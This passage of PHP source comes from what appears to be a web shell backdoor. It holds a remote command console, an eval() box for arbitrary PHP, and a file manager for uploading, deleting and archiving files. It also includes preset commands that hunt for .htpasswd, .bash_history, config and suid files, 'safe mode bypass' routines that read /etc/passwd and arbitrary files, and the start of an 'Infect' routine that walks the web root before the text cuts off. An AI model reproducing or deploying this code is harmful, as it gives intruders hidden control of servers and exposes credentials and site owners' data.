549 echo htmlspecialchars(@fread($fp, 1024));
550 @fclose($fp);
551 }
552 echo '</textarea><input type=submit value="submit"></form>';
553 break;
554 case 'hexdump':
555 $c = @file_get_contents($_POST['p1']);
556 $n = 0;
557 $h = array('00000000<br>','','');
558 $len = strlen($c);
559 for ($i=0; $i<$len; ++$i) {
560 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
561 switch ( ord($c[$i]) ) {
562 case 0: $h[2] .= ' '; break;
563 case 9: $h[2] .= ' '; break;
564 case 10: $h[2] .= ' '; break;
565 case 13: $h[2] .= ' '; break;
566 default: $h[2] .= $c[$i]; break;
567 }
568 $n++;
569 if ($n == 32) {
570 $n = 0;
571 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
572 $h[1] .= '<br>';
573 $h[2] .= "\n";
574 }
575 }
576 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#202832><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#060a10><pre>'.$h[1].'</pre></td><td bgcolor=#202832><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
577 break;
578 case 'rename':
579 if( !empty($_POST['p3']) ) {
580 if(!@rename($_POST['p1'], $_POST['p3']))
581 echo 'Can\'t rename!<br>';
582 else
583 die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
584 }
585 echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value="submit"></form>';
586 break;
587 case 'touch':
588 if( !empty($_POST['p3']) ) {
589 $time = strtotime($_POST['p3']);
590 if($time) {
591 if(!touch($_POST['p1'],$time,$time))
592 echo 'Fail!';
593 else
594 echo 'Touched!';
595 } else echo 'Bad time format!';
596 }
597 clearstatcache();
598 echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value="submit"></form>';
599 break;
600 /* (С) 12.2015 mitryz */
601 case 'frame':
602 $frameSrc = substr(htmlspecialchars($GLOBALS['cwd']), strlen(htmlspecialchars($_SERVER['DOCUMENT_ROOT'])));
603 if ($frameSrc[0] != '/')
604 $frameSrc = '/' . $frameSrc;
605 if ($frameSrc[strlen($frameSrc) - 1] != '/')
606 $frameSrc = $frameSrc . '/';
607 $frameSrc = $frameSrc . htmlspecialchars($_POST['p1']);
608 echo '<iframe width="100%" height="900px" scrolling="no" src='.$frameSrc.' onload="onload=height=contentDocument.body.scrollHeight"></iframe>';
609 break;
610 }
611 echo '</div>';
612 hardFooter();
613}
614if($os == 'win')
615 $aliases = array(
616 "List Directory" => "dir",
617 "Find index.php in current dir" => "dir /s /w /b index.php",
618 "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
619 "Show active connections" => "netstat -an",
620 "Show running services" => "net start",
621 "User accounts" => "net user",
622 "Show computers" => "net view",
623 "ARP Table" => "arp -a",
624 "IP Configuration" => "ipconfig /all"
625 );
626else
627 $aliases = array(
628 "List dir" => "ls -lha",
629 "list file attributes on a Linux second extended file system" => "lsattr -va",
630 "show opened ports" => "netstat -an | grep -i listen",
631 "process status" => "ps aux",
632 "Find" => "",
633 "find all suid files" => "find / -type f -perm -04000 -ls",
634 "find suid files in current dir" => "find . -type f -perm -04000 -ls",
635 "find all sgid files" => "find / -type f -perm -02000 -ls",
636 "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
637 "find config.inc.php files" => "find / -type f -name config.inc.php",
638 "find config* files" => "find / -type f -name \"config*\"",
639 "find config* files in current dir" => "find . -type f -name \"config*\"",
640 "find all writable folders and files" => "find / -perm -2 -ls",
641 "find all writable folders and files in current dir" => "find . -perm -2 -ls",
642 "find all service.pwd files" => "find / -type f -name service.pwd",
643 "find service.pwd files in current dir" => "find . -type f -name service.pwd",
644 "find all .htpasswd files" => "find / -type f -name .htpasswd",
645 "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
646 "find all .bash_history files" => "find / -type f -name .bash_history",
647 "find .bash_history files in current dir" => "find . -type f -name .bash_history",
648 "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
649 "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
650 "Locate" => "",
651 "locate httpd.conf files" => "locate httpd.conf",
652 "locate vhosts.conf files" => "locate vhosts.conf",
653 "locate proftpd.conf files" => "locate proftpd.conf",
654 "locate psybnc.conf files" => "locate psybnc.conf",
655 "locate my.conf files" => "locate my.conf",
656 "locate admin.php files" =>"locate admin.php",
657 "locate cfg.php files" => "locate cfg.php",
658 "locate conf.php files" => "locate conf.php",
659 "locate config.dat files" => "locate config.dat",
660 "locate config.php files" => "locate config.php",
661 "locate config.inc files" => "locate config.inc",
662 "locate config.inc.php" => "locate config.inc.php",
663 "locate config.default.php files" => "locate config.default.php",
664 "locate config* files " => "locate config",
665 "locate .conf files"=>"locate '.conf'",
666 "locate .pwd files" => "locate '.pwd'",
667 "locate .sql files" => "locate '.sql'",
668 "locate .htpasswd files" => "locate '.htpasswd'",
669 "locate .bash_history files" => "locate '.bash_history'",
670 "locate .mysql_history files" => "locate '.mysql_history'",
671 "locate .fetchmailrc files" => "locate '.fetchmailrc'",
672 "locate backup files" => "locate backup",
673 "locate dump files" => "locate dump",
674 "locate priv files" => "locate priv"
675 );
676function actionConsole() {
677 if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
678 prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);
679 $_POST['p1'] .= ' 2>&1';
680 } elseif(!empty($_POST['p1']))
681 prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);
682 if(isset($_POST['ajax'])) {
683 prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
684 ob_start();
685 echo "d.cf.cmd.value='';\n";
686 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0"));
687 if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
688 if(@chdir($match[1])) {
689 $GLOBALS['cwd'] = @getcwd();
690 echo "c_='".$GLOBALS['cwd']."';";
691 }
692 }
693 echo "d.cf.output.value+='".$temp."';";
694 echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
695 $temp = ob_get_clean();
696 echo strlen($temp), "\n", $temp;
697 exit;
698 }
699 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
700 prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
701 hardHeader();
702 echo "<script>
703if(window.Event) window.captureEvents(Event.KEYDOWN);
704var cmds = new Array('');
705var cur = 0;
706function kp(e) {
707 var n = (window.Event) ? e.which : e.keyCode;
708 if(n == 38) {
709 cur--;
710 if(cur>=0)
711 document.cf.cmd.value = cmds[cur];
712 else
713 cur++;
714 } else if(n == 40) {
715 cur++;
716 if(cur < cmds.length)
717 document.cf.cmd.value = cmds[cur];
718 else
719 cur--;
720 }
721}
722function add(cmd) {
723 cmds.pop();
724 cmds.push(cmd);
725 cmds.push('');
726 cur = cmds.length-1;
727}
728</script>";
729 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><label><select name=alias>';
730 foreach($GLOBALS['aliases'] as $n => $v) {
731 if($v == '') {
732 echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
733 continue;
734 }
735 echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
736 }
737
738 echo '</select></label><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value="submit"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin-top:5px;" readonly>';
739 if(!empty($_POST['p1'])) {
740 echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
741 }
742 echo '</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
743 echo '</form></div><script>d.cf.cmd.focus();</script>';
744 hardFooter();
745}
746function actionPhp() {
747 if( isset($_POST['ajax']) ) {
748 $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
749 ob_start();
750 eval($_POST['p1']);
751 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
752 echo strlen($temp), "\n", $temp;
753 exit;
754 }
755 hardHeader();
756 if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
757 echo '<h1>PHP info</h1><div class=content>';
758 ob_start();
759 phpinfo();
760 $tmp = ob_get_clean();
761 $tmp = preg_replace('!body {.*}!msiU','',$tmp);
762 $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
763 $tmp = preg_replace('!h1!msiU','h2',$tmp);
764 $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
765 $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
766 echo $tmp;
767 echo '</div><br>';
768 }
769 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
770 $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
771 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
772 echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
773 if(!empty($_POST['p1'])) {
774 ob_start();
775 eval($_POST['p1']);
776 echo htmlspecialchars(ob_get_clean());
777 }
778 echo '</pre></div>';
779 hardFooter();
780}
781function actionFilesMan() {
782 if (!empty ($_COOKIE['f']))
783 $_COOKIE['f'] = @unserialize($_COOKIE['f']);
784
785 if(!empty($_POST['p1'])) {
786 switch($_POST['p1']) {
787 case 'uploadFile':
788 if ( is_array($_FILES['f']['tmp_name']) ) {
789 foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) {
790 if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) {
791 echo "Can't upload file!";
792 }
793 }
794 }
795 break;
796 case 'mkdir':
797 if(!@mkdir($_POST['p2']))
798 echo "Can't create new dir";
799 break;
800 case 'delete':
801 function deleteDir($path) {
802 $path = (substr($path,-1)=='/') ? $path:$path.'/';
803 $dh = opendir($path);
804 while ( ($▟ = readdir($dh) ) !== false) {
805 $▟ = $path.$▟;
806 if ( (basename($▟) == "..") || (basename($▟) == ".") )
807 continue;
808 $type = filetype($▟);
809 if ($type == "dir")
810 deleteDir($▟);
811 else
812 @unlink($▟);
813 }
814 closedir($dh);
815 @rmdir($path);
816 }
817 if(is_array(@$_POST['f']))
818 foreach($_POST['f'] as $f) {
819 if($f == '..')
820 continue;
821 $f = urldecode($f);
822 if(is_dir($f))
823 deleteDir($f);
824 else
825 @unlink($f);
826 }
827 break;
828 case 'paste':
829 if($_COOKIE['act'] == 'copy') {
830 function copy_paste($c,$s,$d){
831 if(is_dir($c.$s)){
832 mkdir($d.$s);
833 $h = @opendir($c.$s);
834 while (($f = @readdir($h)) !== false)
835 if (($f != ".") and ($f != ".."))
836 copy_paste($c.$s.'/',$f, $d.$s.'/');
837 } elseif(is_file($c.$s))
838 @copy($c.$s, $d.$s);
839 }
840 foreach($_COOKIE['f'] as $f)
841 copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']);
842 } elseif($_COOKIE['act'] == 'move') {
843 function move_paste($c,$s,$d){
844 if(is_dir($c.$s)){
845 mkdir($d.$s);
846 $h = @opendir($c.$s);
847 while (($f = @readdir($h)) !== false)
848 if (($f != ".") and ($f != ".."))
849 copy_paste($c.$s.'/',$f, $d.$s.'/');
850 } elseif(@is_file($c.$s))
851 @copy($c.$s, $d.$s);
852 }
853 foreach($_COOKIE['f'] as $f)
854 @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
855 } elseif($_COOKIE['act'] == 'zip') {
856 if(class_exists('ZipArchive')) {
857 $zip = new ZipArchive();
858 if ($zip->open($_POST['p2'], 1)) {
859 chdir($_COOKIE['c']);
860 foreach($_COOKIE['f'] as $f) {
861 if($f == '..')
862 continue;
863 if(@is_file($_COOKIE['c'].$f))
864 $zip->addFile($_COOKIE['c'].$f, $f);
865 elseif(@is_dir($_COOKIE['c'].$f)) {
866 $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
867 foreach ($iterator as $key=>$value) {
868 $zip->addFile(realpath($key), $key);
869 }
870 }
871 }
872 chdir($GLOBALS['cwd']);
873 $zip->close();
874 }
875 }
876 } elseif($_COOKIE['act'] == 'unzip') {
877 if(class_exists('ZipArchive')) {
878 $zip = new ZipArchive();
879 foreach($_COOKIE['f'] as $f) {
880 if($zip->open($_COOKIE['c'].$f)) {
881 $zip->extractTo($GLOBALS['cwd']);
882 $zip->close();
883 }
884 }
885 }
886 } elseif($_COOKIE['act'] == 'tar') {
887 chdir($_COOKIE['c']);
888 $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
889 ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
890 chdir($GLOBALS['cwd']);
891 }
892 unset($_COOKIE['f']);
893 setcookie('f', '', time() - 3600);
894 break;
895 default:
896 if(!empty($_POST['p1'])) {
897 prototype('act', $_POST['p1']);
898 prototype('f', serialize(@$_POST['f']));
899 prototype('c', @$_POST['c']);
900 }
901 break;
902 }
903 }
904 hardHeader();
905 echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
906 $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
907 if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; }
908 global $sort;
909 $sort = array('name', 1);
910 if(!empty($_POST['p1'])) {
911 if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
912 $sort = array($match[1], (int)$match[2]);
913 }
914echo "<script>
915 function sa() {
916 for(i=0;i<d.files.elements.length;i++)
917 if(d.files.elements[i].type == 'checkbox')
918 d.files.elements[i].checked = d.files.elements[0].checked;
919 }
920</script>
921<table width='100%' class='main' cellspacing='0' cellpadding='2'>
922<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
923 $dirs = $files = array();
924 $n = count($dirContent);
925 for($i=0;$i<$n;$i++) {
926 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
927 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
928 $tmp = array('name' => $dirContent[$i],
929 'path' => $GLOBALS['cwd'].$dirContent[$i],
930 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
931 'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
932 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
933 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
934 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
935 );
936 if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
937 $files[] = array_merge($tmp, array('type' => 'file'));
938 elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
939 $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
940 elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&&($dirContent[$i] != "."))
941 $dirs[] = array_merge($tmp, array('type' => 'dir'));
942 }
943 $GLOBALS['sort'] = $sort;
944 function cmp($a, $b) {
945 if($GLOBALS['sort'][0] != 'size')
946 return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
947 else
948 return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
949 }
950 usort($files, "cmp");
951 usort($dirs, "cmp");
952 $files = array_merge($dirs, $files);
953 $l = 0;
954 foreach($files as $f) {
955 echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
956 .'</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a class="tooltip" data-tooltip="Frame" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'frame\')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
957 $l = $l?0:1;
958 }
959 echo "<tr id=fak><td colspan=7>
960 <input type=hidden name=ne value=''>
961 <input type=hidden name=a value='FilesMan'>
962 <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
963 <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
964 <label><select name='p1'>";
965 if(!empty($_COOKIE['act']) && @count($_COOKIE['f']))
966 echo "<option value='paste'>↳ Paste</option>";
967 echo "<option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
968 if(class_exists('ZipArchive'))
969 echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>";
970 echo "<option value='tar'>+ tar.gz</option>";
971 echo "</select></label>";
972 if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
973 echo " file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'> ";
974 echo "<input type='submit' value='submit'></td></tr></form></table></div>";
975 hardFooter();
976}
977function actionStringTools() {
978 if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
979 if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
980 if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
981 if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
982 if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
983 $stringTools = array(
984 'Base64 encode' => 'base64_encode',
985 'Base64 decode' => 'base64_decode',
986 'Url encode' => 'urlencode',
987 'Url decode' => 'urldecode',
988 'Full urlencode' => 'full_urlencode',
989 'md5 hash' => 'md5',
990 'sha1 hash' => 'sha1',
991 'crypt' => 'crypt',
992 'CRC32' => 'crc32',
993 'ASCII to HEX' => 'ascii2hex',
994 'HEX to ASCII' => 'hex2ascii',
995 'HEX to DEC' => 'hexdec',
996 'HEX to BIN' => 'hex2bin',
997 'DEC to HEX' => 'dechex',
998 'DEC to BIN' => 'decbin',
999 'BIN to HEX' => 'binhex',
1000 'BIN to DEC' => 'bindec',
1001 'String to lower case' => 'strtolower',
1002 'String to upper case' => 'strtoupper',
1003 'Htmlspecialchars' => 'htmlspecialchars',
1004 'String length' => 'strlen',
1005 );
1006 if(isset($_POST['ajax'])) {
1007 prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
1008 ob_start();
1009 if(in_array($_POST['p1'], $stringTools))
1010 echo $_POST['p1']($_POST['p2']);
1011 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
1012 echo strlen($temp), "\n", $temp;
1013 exit;
1014 }
1015 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1016 prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
1017 hardHeader();
1018 echo '<h1>String conversions</h1><div class=content>';
1019 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><label><select name='selectTool'>";
1020 foreach($stringTools as $k => $v)
1021 echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
1022 echo "</select></label><input type='submit' value='submit'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
1023 if(!empty($_POST['p1'])) {
1024 if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
1025 }
1026 echo"</pre></div><br><h1>Search files:</h1><div class=content>
1027 <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
1028 <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
1029 <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
1030 <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
1031 <tr><td></td><td><input type='submit' value='submit'></td></tr>
1032 </table></form>";
1033 function hardRecursiveGlob($path) {
1034 if(substr($path, -1) != '/')
1035 $path.='/';
1036 $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
1037 if(is_array($paths)&&@count($paths)) {
1038 foreach($paths as $▟) {
1039 if(@is_dir($▟)){
1040 if($path!=$▟)
1041 hardRecursiveGlob($▟);
1042 } else {
1043 if(empty($_POST['p2']) || @strpos(file_get_contents($▟), $_POST['p2'])!==false)
1044 echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($▟)."\", \"view\",\"\")'>".htmlspecialchars($▟)."</a><br>";
1045 }
1046 }
1047 }
1048 }
1049 if(@$_POST['p3'])
1050 hardRecursiveGlob($_POST['c']);
1051 echo "</div><br><h1>Search for hash:</h1><div class=content>
1052 <form method='post' target='_blank' name='hf'>
1053 <input type='text' name='hash' style='width:200px;'><br>
1054 <input type='hidden' name='act' value='find'/>
1055 <input type='submit' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
1056 <input type='submit' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
1057 <input type='submit' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br>
1058 <input type='submit' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
1059 <input type='submit' value='toolki.com' onclick=\"document.hf.action='http://toolki.com/';document.hf.submit()\"><br>
1060 <input type='submit' value='fopo.com.ar' onclick=\"document.hf.action='http://fopo.com.ar/';document.hf.submit()\"><br>
1061 <input type='submit' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
1062 </form></div>";
1063 hardFooter();
1064}
1065function actionSafeMode() {
1066 $temp='';
1067 ob_start();
1068 switch($_POST['p1']) {
1069 case 1:
1070 $temp=@tempnam($test, 'cx');
1071 if(@copy("compress.zlib://".$_POST['p2'], $temp)){
1072 echo @file_get_contents($temp);
1073 unlink($temp);
1074 } else
1075 echo 'Sorry... Can\'t open file';
1076 break;
1077 case 2:
1078 $files = glob($_POST['p2'].'*');
1079 if( is_array($files) )
1080 foreach ($files as $filename)
1081 echo $filename."\n";
1082 break;
1083 case 3:
1084 $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
1085 curl_exec($ch);
1086 break;
1087 case 4:
1088 ini_restore("safe_mode");
1089 ini_restore("open_basedir");
1090 include($_POST['p2']);
1091 break;
1092 case 5:
1093 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
1094 $uid = @posix_getpwuid($_POST['p2']);
1095 if ($uid)
1096 echo join(':',$uid)."\n";
1097 }
1098 break;
1099 case 6:
1100 if(!function_exists('imap_open'))break;
1101 $stream = imap_open($_POST['p2'], "", "");
1102 if ($stream == FALSE)
1103 break;
1104 echo imap_body($stream, 1);
1105 imap_close($stream);
1106 break;
1107 }
1108 $temp = ob_get_clean();
1109 hardHeader();
1110 echo '<h1>Safe mode bypass</h1><div class=content>';
1111 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value="submit"></form>';
1112 if($temp)
1113 echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
1114 echo '</div>';
1115 hardFooter();
1116}
1117function actionLogout() {
1118 setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
1119die('
1120<script>
1121alert("Success!");
1122</script>
1123');
1124}
1125function actionSelfRemove() {
1126 if($_POST['p1'] == 'yes')
1127 if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
1128 die('Shell has been removed');
1129 else
1130 echo 'unlink error!';
1131 if($_POST['p1'] != 'yes')
1132 hardHeader();
1133 echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1134 hardFooter();
1135}
1136function actionInfect() {
1137 hardHeader();
1138 echo '<h1>Infect</h1><div class=content>';
1139 if($_POST['p1'] == 'infect') {
1140 $target=$_SERVER['DOCUMENT_ROOT'];
1141 function ListFiles($dir) {
1142 if($dh = opendir($dir)) {
1143 $files = Array();
1144 $inner_files = Array();
1145 while($file = readdir($dh)) {
1146 if($file != "." && $file != "..") {
1147 if(is_dir($dir . "/" . $file)) {
1148 $inner_files = ListFiles($dir . "/" . $file);
1149 if(is_array($inner_files)) $files = array_merge($files, $inner_files);
1150 } else {
1151 array_push($files, $dir . "/" . $file);
1152 }
1153 }
1154 }
1155 closedir($dh);
1156 return $files;
1157 }
1158 }
1159 foreach (ListFiles($target) as $key=>$file){
